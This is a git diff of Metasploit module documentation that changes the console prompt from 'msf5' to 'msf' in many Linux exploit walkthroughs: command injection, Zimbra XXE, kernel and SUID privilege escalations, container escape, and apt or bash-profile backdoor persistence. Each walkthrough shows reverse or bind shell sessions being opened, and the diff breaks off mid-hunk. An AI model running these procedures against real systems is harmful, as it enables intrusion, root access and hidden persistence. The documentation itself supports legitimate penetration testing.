Started reverse TCP handler on 10.12.70.238:4444 [*] Command Stager progress - 9.95% done (127/1276 bytes) @@ -69,18 +69,18 @@ Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST #### Busybox/Telnetd Bind Shell ``` -msf5 > use exploit/linux/http/wepresent_cmd_injection -msf5 exploit(linux/http/wepresent_cmd_injection) > set target 0 +msf > use exploit/linux/http/wepresent_cmd_injection +msf exploit(linux/http/wepresent_cmd_injection) > set target 0 target => 0 -msf5 exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd +msf exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd payload => cmd/unix/bind_busybox_telnetd -msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246 +msf exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246 RHOSTS => 10.12.70.246 -msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238 +msf exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238 LHOST => 10.12.70.238 -msf5 exploit(linux/http/wepresent_cmd_injection) > check +msf exploit(linux/http/wepresent_cmd_injection) > check [+] 10.12.70.246:443 - The target is vulnerable. -msf5 exploit(linux/http/wepresent_cmd_injection) > run +msf exploit(linux/http/wepresent_cmd_injection) > run [*] Started bind TCP handler against 10.12.70.246:4444 [*] Command shell session 1 opened (10.12.70.238:41457 -> 10.12.70.246:4444) at 2020-01-09 05:56:36 -0500 diff --git a/documentation/modules/exploit/linux/http/zimbra_xxe_rce.md b/documentation/modules/exploit/linux/http/zimbra_xxe_rce.md index 32c77f26fe..e0dbde29a0 100644 --- a/documentation/modules/exploit/linux/http/zimbra_xxe_rce.md +++ b/documentation/modules/exploit/linux/http/zimbra_xxe_rce.md @@ -23,7 +23,7 @@ Zimbra Collaboration Suite v8.5 to v8.7.11. ### Zimbra 8.7.1 GA 1670 FOSS edition Tested on Ubuntu 16.04.6 LTS ``` -msf5 exploit(linux/http/zimbra_xxe_rce) > exploit +msf exploit(linux/http/zimbra_xxe_rce) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Using URL: http://0.0.0.0:8080/2tQ75DxRvaeGRSP diff --git a/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md b/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md index 6889323188..7fcff3830b 100644 --- a/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md +++ b/documentation/modules/exploit/linux/local/abrt_sosreport_priv_esc.md @@ -47,12 +47,12 @@ ### Red Hat Enterprise Linux 7.0 (x64) ``` - msf5 > use exploit/linux/local/abrt_sosreport_priv_esc - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true + msf > use exploit/linux/local/abrt_sosreport_priv_esc + msf exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1 + msf exploit(linux/local/abrt_sosreport_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run + msf exploit(linux/local/abrt_sosreport_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] System is configured to use ABRT for crash reporting @@ -85,12 +85,12 @@ ### Red Hat Enterprise Linux 7.1 (x64) ``` - msf5 > use exploit/linux/local/abrt_sosreport_priv_esc - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true + msf > use exploit/linux/local/abrt_sosreport_priv_esc + msf exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1 + msf exploit(linux/local/abrt_sosreport_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run + msf exploit(linux/local/abrt_sosreport_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] System is configured to use ABRT for crash reporting diff --git a/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md index a96fe6992f..dfc67df761 100644 --- a/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md +++ b/documentation/modules/exploit/linux/local/af_packet_chocobo_root_priv_esc.md @@ -79,10 +79,10 @@ The executable was cross-compiled with [musl-cross](https://s3.amazonaws.com/mus ## Scenarios ``` - msf5 > use exploit/linux/local/af_packet_chocobo_root_priv_esc - msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set session 1 + msf > use exploit/linux/local/af_packet_chocobo_root_priv_esc + msf exploit(linux/local/af_packet_chocobo_root_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run + msf exploit(linux/local/af_packet_chocobo_root_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.iDLrwN3S4.c' (24885 bytes) ... [*] Writing '/tmp/.rMIvkKT' (207 bytes) ... diff --git a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md index 1314da491b..badf782bba 100644 --- a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md +++ b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md @@ -65,10 +65,10 @@ ## Scenarios ``` - msf5 > use exploit/linux/local/af_packet_packet_set_ring_priv_esc - msf5 exploit(linux/local/af_packet_packet_set_ring_priv_esc) > set session 1 + msf > use exploit/linux/local/af_packet_packet_set_ring_priv_esc + msf exploit(linux/local/af_packet_packet_set_ring_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/af_packet_packet_set_ring_priv_esc) > run + msf exploit(linux/local/af_packet_packet_set_ring_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.ZxgWSP2O1.c' (19378 bytes) ... diff --git a/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md index d2beec8e8b..3d3f78b491 100644 --- a/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md +++ b/documentation/modules/exploit/linux/local/apt_package_manager_persistence.md @@ -34,33 +34,33 @@ Writable directory for backdoor default is (/usr/local/bin/) ### Tested on Ubuntu 18.04.2 LTS ``` -msf5 > use exploit/linux/local/apt_package_manager_persistence -msf5 exploit(linux/local/apt_package_manager_persistence) > handler -p linux/x86/meterpreter/reverse_tcp -H 172.22.222.136 -P 4444 +msf > use exploit/linux/local/apt_package_manager_persistence +msf exploit(linux/local/apt_package_manager_persistence) > handler -p linux/x86/meterpreter/reverse_tcp -H 172.22.222.136 -P 4444 [*] Payload handler running as background job 0. -msf5 exploit(linux/local/apt_package_manager_persistence) > +msf exploit(linux/local/apt_package_manager_persistence) > [*] Started reverse TCP handler on 172.22.222.136:4444 [*] Sending stage (985320 bytes) to 172.22.222.130 [*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.130:60526) at 2019-04-26 13:04:33 -0500 -msf5 exploit(linux/local/apt_package_manager_persistence) > set session 1 +msf exploit(linux/local/apt_package_manager_persistence) > set session 1 session => 1 -msf5 exploit(linux/local/apt_package_manager_persistence) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(linux/local/apt_package_manager_persistence) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(linux/local/apt_package_manager_persistence) > set lhost 172.22.222.136 +msf exploit(linux/local/apt_package_manager_persistence) > set lhost 172.22.222.136 lhost => 172.22.222.136 -msf5 exploit(linux/local/apt_package_manager_persistence) > set lport 4444 +msf exploit(linux/local/apt_package_manager_persistence) > set lport 4444 lport => 4444 -msf5 exploit(linux/local/apt_package_manager_persistence) > exploit +msf exploit(linux/local/apt_package_manager_persistence) > exploit [*] Attempting to write hook: [*] Wrote /etc/apt/apt.conf.d/34bmUIzfd [*] Backdoor uploaded /usr/local/bin/dbmqKeh6U9 [*] Backdoor will run on next APT update -msf5 exploit(linux/local/apt_package_manager_persistence) > +msf exploit(linux/local/apt_package_manager_persistence) > [*] Sending stage (985320 bytes) to 172.22.222.130 [*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.130:60528) at 2019-04-26 13:05:17 -0500 -msf5 exploit(linux/local/apt_package_manager_persistence) > +msf exploit(linux/local/apt_package_manager_persistence) > ``` Note: Second session comes in after running `apt update` on the remote host diff --git a/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md b/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md index f8b5c34c6f..0fee4f44f7 100644 --- a/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md +++ b/documentation/modules/exploit/linux/local/asan_suid_executable_priv_esc.md @@ -64,14 +64,14 @@ ### Command Shell Session (Linux Mint 19) ``` - msf5 > use exploit/linux/local/asan_suid_executable_priv_esc - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out + msf > use exploit/linux/local/asan_suid_executable_priv_esc + msf exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out suid_executable => /usr/bin/a.out - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1 + msf exploit(linux/local/asan_suid_executable_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true + msf exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run + msf exploit(linux/local/asan_suid_executable_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] /usr/bin/a.out is setuid @@ -120,14 +120,14 @@ ### Meterpreter Session (Linux Mint 19) ``` - msf5 > use exploit/linux/local/asan_suid_executable_priv_esc - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1 + msf > use exploit/linux/local/asan_suid_executable_priv_esc + msf exploit(linux/local/asan_suid_executable_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out + msf exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out suid_executable => /usr/bin/a.out - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true + msf exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run + msf exploit(linux/local/asan_suid_executable_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] /usr/bin/a.out is setuid diff --git a/documentation/modules/exploit/linux/local/bash_profile_persistence.md b/documentation/modules/exploit/linux/local/bash_profile_persistence.md index c591fb6286..69085dc08e 100644 --- a/documentation/modules/exploit/linux/local/bash_profile_persistence.md +++ b/documentation/modules/exploit/linux/local/bash_profile_persistence.md @@ -35,9 +35,9 @@ ## Scenarios ``` -msf5 > use exploit/linux/local/bash_profile_persistence -msf5 exploit(linux/local/bash_profile_persistence) > set SESSION 1 -msf5 exploit(linux/local/bash_profile_persistence) > exploit +msf > use exploit/linux/local/bash_profile_persistence +msf exploit(linux/local/bash_profile_persistence) > set SESSION 1 +msf exploit(linux/local/bash_profile_persistence) > exploit [*] Bash profile exists: /home/user/.bashrc [*] Bash profile is writable: /home/user/.bashrc diff --git a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md index 6af9f291bc..23848c9dd5 100644 --- a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md +++ b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md @@ -57,14 +57,14 @@ ## Scenarios ``` - msf5 > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc - msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1 + msf > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc + msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run + msf exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.DKJWL0TG7sm0M5' (249 bytes) ... diff --git a/documentation/modules/exploit/linux/local/bpf_priv_esc.md b/documentation/modules/exploit/linux/local/bpf_priv_esc.md index 40cfc7bfc0..6109907adb 100644 --- a/documentation/modules/exploit/linux/local/bpf_priv_esc.md +++ b/documentation/modules/exploit/linux/local/bpf_priv_esc.md @@ -73,14 +73,14 @@ There are a few requirements for this module to work: In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system. ``` - msf5 > use exploit/linux/local/bpf_priv_esc - msf5 exploit(linux/local/bpf_priv_esc) > set session 1 + msf > use exploit/linux/local/bpf_priv_esc + msf exploit(linux/local/bpf_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/bpf_priv_esc) > set verbose true + msf exploit(linux/local/bpf_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/bpf_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/bpf_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/bpf_priv_esc) > run + msf exploit(linux/local/bpf_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] Kernel version 4.4.0-21-generic appears to be vulnerable diff --git a/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md b/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md index ab3870ebd2..dc521c59e2 100644 --- a/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md +++ b/documentation/modules/exploit/linux/local/bpf_sign_extension_priv_esc.md @@ -162,12 +162,12 @@ It is possible to force pre-compiled binaries, in a scenario where `build-essent ### Debian 9.0 (x86_64) ``` - msf5 > use exploit/linux/local/bpf_sign_extension_priv_esc - msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1 + msf > use exploit/linux/local/bpf_sign_extension_priv_esc + msf exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set compile False + msf exploit(linux/local/bpf_sign_extension_priv_esc) > set compile False compile => False - msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run + msf exploit(linux/local/bpf_sign_extension_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.JBJBxoEO' (34784 bytes) ... diff --git a/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md b/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md index 4c0568d9f9..40c802eecf 100644 --- a/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md +++ b/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md @@ -7,7 +7,7 @@ It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 ## Scenarios ``` -msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run +msf exploit(linux/local/cpi_runrshell_priv_esc) > run [*] Started reverse TCP handler on 192.168.0.21:4444 [*] Uploading /tmp/mYVrqmsETa.bin diff --git a/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md b/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md index 075d75602c..e638123992 100644 --- a/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md +++ b/documentation/modules/exploit/linux/local/diamorphine_rootkit_signal_priv_esc.md @@ -32,17 +32,17 @@ ### Linux Mint 19 (x64) ``` - msf5 > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc - msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1 + msf > use exploit/linux/local/diamorphine_rootkit_signal_priv_esc + msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true + msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check + msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > check [*] Executing id ... uid=0(root) gid=0(root) groups=0(root),1001(test) [+] The target is vulnerable. Diamorphine is installed and configured to handle signal '64'. - msf5 exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run + msf exploit(linux/local/diamorphine_rootkit_signal_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Executing id ... diff --git a/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md b/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md index 13bcef4afc..b81e018187 100644 --- a/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md +++ b/documentation/modules/exploit/linux/local/docker_priviledged_container_escape.md @@ -65,10 +65,10 @@ A directory where we can write files on the host (default is /tmp). This is need ## Container Escape starting with a meterpreter shell ``` -msf5 exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape -msf5 exploit(linux/local/lxc_privilege_escalation) > set session 1 +msf exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape +msf exploit(linux/local/lxc_privilege_escalation) > set session 1 session => 1 -msf5 exploit(linux/local/lxc_privilege_escalation) > run +msf exploit(linux/local/lxc_privilege_escalation) > run [*] Started reverse TCP handler on 10.0.2.15:4444 [*] Writing payload executable to '/tmp/aLQdBKpMXLo' diff --git a/documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md b/documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md index 6a84a2c0dc..c1e7b6827f 100644 --- a/documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md +++ b/documentation/modules/exploit/linux/local/exim4_deliver_message_priv_esc.md @@ -56,20 +56,20 @@ meterpreter > getuid Server username: uid=1000, gid=1000, euid=1000, egid=1000 meterpreter > Background session 1? [y/N] -msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1 +msf exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1 session => 1 -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50 +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50 lhost => 192.168.0.50 -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lport 13371 +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set lport 13371 lport => 13371 -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set EXIMPATH /usr/exim/bin/exim +msf exploit(linux/local/exim4_deliver_message_priv_esc) > set EXIMPATH /usr/exim/bin/exim EXIMPATH => /usr/exim/bin/exim -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check +msf exploit(linux/local/exim4_deliver_message_priv_esc) > check [*] The target appears to be vulnerable. -msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit +msf exploit(linux/local/exim4_deliver_message_priv_esc) > exploit [*] Started reverse TCP handler on 192.168.0.50:13371 [*] Payload sent, wait a few seconds... diff --git a/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md index d5caa3eeda..12576f63e3 100644 --- a/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md +++ b/documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md @@ -53,10 +53,10 @@ ## Scenarios ``` - msf5 > use exploit/linux/local/glibc_realpath_priv_esc - msf5 exploit(linux/local/glibc_realpath_priv_esc) > set session 1 + msf > use exploit/linux/local/glibc_realpath_priv_esc + msf exploit(linux/local/glibc_realpath_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/glibc_realpath_priv_esc) > run + msf exploit(linux/local/glibc_realpath_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.DhRxy0FQR.c' (35470 bytes) ... diff --git a/documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md b/documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md index 979e3f6772..ee8d99c254 100644 --- a/documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md +++ b/documentation/modules/exploit/linux/local/hp_xglance_priv_esc.md @@ -175,7 +175,7 @@ Path to the `xglance-bin` executable. Default is `/opt/perf/bin/xglance-bin`. [*] Auxiliary module execution completed ``` ``` - msf5 exploit(linux/local/hp_xglance_priv_esc) > rexploit + msf exploit(linux/local/hp_xglance_priv_esc) > rexploit [*] Reloading module... [!] SESSION may not be compatible with this module. diff --git a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md index 2ce5b01541..933be480ed 100644 --- a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md @@ -43,21 +43,21 @@ ### ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64) ``` - msf5 > use exploit/linux/local/ktsuss_suid_priv_esc - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 + msf > use exploit/linux/local/ktsuss_suid_priv_esc + msf exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true + msf exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check + msf exploit(linux/local/ktsuss_suid_priv_esc) > check [+] /usr/bin/ktsuss is setuid [*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test) [+] The target is vulnerable. - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run + msf exploit(linux/local/ktsuss_suid_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /usr/bin/ktsuss is setuid @@ -83,21 +83,21 @@ ### ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) ``` - msf5 > use exploit/linux/local/ktsuss_suid_priv_esc - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 + msf > use exploit/linux/local/ktsuss_suid_priv_esc + msf exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true + msf exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check + msf exploit(linux/local/ktsuss_suid_priv_esc) > check [+] /usr/bin/ktsuss is setuid [*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test) [+] The target is vulnerable. - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 + msf exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run + msf exploit(linux/local/ktsuss_suid_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] /usr/bin/ktsuss is setuid diff --git a/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md b/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md index 49257dff7f..e455adf277 100644 --- a/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md +++ b/documentation/modules/exploit/linux/local/libuser_roothelper_priv_esc.md @@ -76,11 +76,11 @@ ### libuser 0.56.13-5.el6 on Red Hat 6.6 (x86_64) ``` - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 + msf exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set password password + msf exploit(linux/local/libuser_roothelper_priv_esc) > set password password password => password - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run + msf exploit(linux/local/libuser_roothelper_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.QQ4pE9nj.c' (29342 bytes) ... @@ -103,11 +103,11 @@ ### libuser 0.60-5.el7 on CentOS 7.1-1503 (x86_64) ``` - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 + msf exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set password password + msf exploit(linux/local/libuser_roothelper_priv_esc) > set password password password => password - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run + msf exploit(linux/local/libuser_roothelper_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.Ake5GA' (103396 bytes) ... @@ -130,11 +130,11 @@ ### libuser 0.60-6.fc21 on Fedora Desktop 21 (x86_64) ``` - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 + msf exploit(linux/local/libuser_roothelper_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > set password password + msf exploit(linux/local/libuser_roothelper_priv_esc) > set password password password => password - msf5 exploit(linux/local/libuser_roothelper_priv_esc) > run + msf exploit(linux/local/libuser_roothelper_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing '/tmp/.ByQC9FHS.c' (29342 bytes) ... diff --git a/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md b/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md index 0d73624685..2fa286508c 100644 --- a/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md +++ b/documentation/modules/exploit/linux/local/nested_namespace_idmap_limit_priv_esc.md @@ -74,23 +74,23 @@ The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/m ### Fedora Workstation 28 (verbose output) ``` - msf5 > use exploit/linux/local/nested_namespace_idmap_limit_priv_esc - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + msf > use exploit/linux/local/nested_namespace_idmap_limit_priv_esc + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set session 1 + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set session 1 session => 1 - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set lhost 172.16.191.188 + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set verbose true + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set verbose true verbose => true - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > check + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > check [+] Unprivileged user namespaces are permitted [+] /usr/bin/newuidmap is set-uid [+] /usr/bin/newgidmap is set-uid [+] Kernel version 4.16.3-301.fc28.x86_64 appears to be vulnerable [*] The target appears to be vulnerable. - msf5 exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > run + msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [+] Unprivileged user namespaces are permitted diff --git a/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md b/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md index a9e5057576..46f59b090d 100644 --- a/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md +++ b/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md @@ -56,14 +56,14 @@ ## Scenarios ``` - msf5 > use exploit/linux/local/network_manager_vpnc_username_priv_esc - msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1 + msf > use exploit/linux/local/network_manager_vpnc_username_priv_esc + msf exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1 session => 1 - 